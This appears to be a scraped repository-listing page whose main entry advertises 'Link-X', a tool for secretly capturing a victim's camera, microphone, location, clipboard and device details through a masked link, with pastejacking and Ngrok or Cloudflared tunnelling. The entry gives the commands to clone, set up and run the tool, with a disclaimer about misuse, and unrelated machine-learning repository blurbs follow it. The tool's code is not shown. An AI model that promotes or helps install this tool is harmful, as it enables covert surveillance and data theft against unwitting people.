Hack Camera, Microphone, Location, Clipboard With Just a Link. Also, Get Many Details About Victim's Device. And So On...

Related tags

Deep LearningLink-X
Overview

Link-X

An Automated Tool to Hack Victim's Camera, Microphone, Location, Clipboard. Has 2 Extra Features.

Version 1.1 Update

  • Fixed Some Major Bugs
  • Data Saving Directory Changed To Storage Folder

    Features

  • Hack Camera
  • Hack Microphone
  • Hack Clipboard
  • Hack Location
  • Get So Many Details about Victim's Device. As much as Possible...
  • Prank Victim Using PasteJacking
  • Supports Custom HTML page to Show to Victim.
  • Supports URL Masking

    Supported Port Forwardings

  • Localhost
  • CloudFlared
  • Ngrok

    Installation Commands

    apt update -y
    apt upgrade -y
    pkg install python git -y
    git clone https://github.com/Toxic-Noob/Link-X
    cd Link-X
    bash setup.sh
    python link-x.py
    

    Note

    [*] USE IT, AT YOUR OWN RISK

    [*] ToxicNoob is not Responsible for Any Misuse

    Contact

    [*] Contact with Me via Email

    [email protected]

    Tool ScreenShots :

    Link-X 1 Link-X 2 Link-X 3 Link-X 4

    Visitors :

    Visitor Count

  • Owner
    ToxicNoob
    From an Ordinary country, I'm an Extraordinary Person.
    ToxicNoob
    Implementation for "Exploiting Aliasing for Manga Restoration" (CVPR 2021)

    [CVPR Paper](To appear) | [Project Website](To appear) | BibTex Introduction As a popular entertainment art form, manga enriches the line drawings det

    133 Dec 15, 2022
    网络协议2天集训

    网络协议2天集训 抓包工具安装 Wireshark wireshark下载地址 Tcpdump CentOS yum install tcpdump -y Ubuntu apt-get install tcpdump -y k8s抓包测试环境 查看虚拟网卡veth pair 查看

    120 Dec 12, 2022
    Employee-Managment - Company employee registration software in the face recognition system

    Employee-Managment Company employee registration software in the face recognitio

    Alireza Kiaeipour 7 Jul 10, 2022
    Implementation of STAM (Space Time Attention Model), a pure and simple attention model that reaches SOTA for video classification

    STAM - Pytorch Implementation of STAM (Space Time Attention Model), yet another pure and simple SOTA attention model that bests all previous models in

    Phil Wang 109 Dec 28, 2022
    Deep learning algorithms for muon momentum estimation in the CMS Trigger System

    Deep learning algorithms for muon momentum estimation in the CMS Trigger System The Compact Muon Solenoid (CMS) is a general-purpose detector at the L

    anuragB 2 Oct 06, 2021
    Telegram chatbot created with deep learning model (LSTM) and telebot library.

    Telegram chatbot Telegram chatbot created with deep learning model (LSTM) and telebot library. Description This program will allow you to create very

    1 Jan 04, 2022
    View model summaries in PyTorch!

    torchinfo (formerly torch-summary) Torchinfo provides information complementary to what is provided by print(your_model) in PyTorch, similar to Tensor

    Tyler Yep 1.5k Jan 05, 2023
    Code for CPM-2 Pre-Train

    CPM-2 Pre-Train Pre-train CPM-2 此分支为110亿非 MoE 模型的预训练代码,MoE 模型的预训练代码请切换到 moe 分支 CPM-2技术报告请参考link。 0 模型下载 请在智源资源下载页面进行申请,文件介绍如下: 文件名 描述 参数大小 100000.tar

    Tsinghua AI 136 Dec 28, 2022
    Unsupervised Learning of Video Representations using LSTMs

    Unsupervised Learning of Video Representations using LSTMs Code for paper Unsupervised Learning of Video Representations using LSTMs by Nitish Srivast

    Elman Mansimov 341 Dec 20, 2022
    Time-series-deep-learning - Developing Deep learning LSTM, BiLSTM models, and NeuralProphet for multi-step time-series forecasting of stock price.

    Stock Price Prediction Using Deep Learning Univariate Time Series Predicting stock price using historical data of a company using Neural networks for

    Abdultawwab Safarji 7 Nov 27, 2022
    Tensorflow Tutorials using Jupyter Notebook

    Tensorflow Tutorials using Jupyter Notebook TensorFlow tutorials written in Python (of course) with Jupyter Notebook. Tried to explain as kindly as po

    Sungjoon 2.6k Dec 22, 2022
    In this work, we will implement some basic but important algorithm of machine learning step by step.

    WoRkS continued English 中文 Français Probability Density Estimation-Non-Parametric Methods(概率密度估计-非参数方法) 1. Kernel / k-Nearest Neighborhood Density Est

    liziyu0104 1 Dec 30, 2021
    Unadversarial Examples: Designing Objects for Robust Vision

    Unadversarial Examples: Designing Objects for Robust Vision This repository contains the code necessary to replicate the major results of our paper: U

    Microsoft 93 Nov 28, 2022
    DIR-GNN - Discovering Invariant Rationales for Graph Neural Networks

    DIR-GNN "Discovering Invariant Rationales for Graph Neural Networks" (ICLR 2022)

    Ying-Xin (Shirley) Wu 70 Nov 13, 2022
    HNN: Human (Hollywood) Neural Network

    HNN: Human (Hollywood) Neural Network Learn the top 1000 actors on IMDB with your very own low cost, highly parallel, CUDAless biological neural netwo

    Madhava Jay 0 Dec 21, 2021
    Gray Zone Assessment

    Gray Zone Assessment Get started Clone github repository git clone https://github.com/andreanne-lemay/gray_zone_assessment.git Build docker image dock

    1 Jan 08, 2022
    Repo for the ACMMM20 submission: "Personalized breath based biometric authentication with wearable multimodality".

    personalized-breath Repo for the ACMMM20 submission: "Personalized breath based biometric authentication with wearable multimodality". Guideline To ex

    Manh-Ha Bui 2 Nov 15, 2021
    Soft actor-critic is a deep reinforcement learning framework for training maximum entropy policies in continuous domains.

    This repository is no longer maintained. Please use our new Softlearning package instead. Soft Actor-Critic Soft actor-critic is a deep reinforcement

    Tuomas Haarnoja 752 Jan 07, 2023
    Predicting lncRNA–protein interactions based on graph autoencoders and collaborative training

    Predicting lncRNA–protein interactions based on graph autoencoders and collaborative training Code for our paper "Predicting lncRNA–protein interactio

    zhanglabNKU 1 Nov 29, 2022
    A resource for learning about deep learning techniques from regression to LSTM and Reinforcement Learning using financial data and the fitness functions of algorithmic trading

    A tour through tensorflow with financial data I present several models ranging in complexity from simple regression to LSTM and policy networks. The s

    195 Dec 07, 2022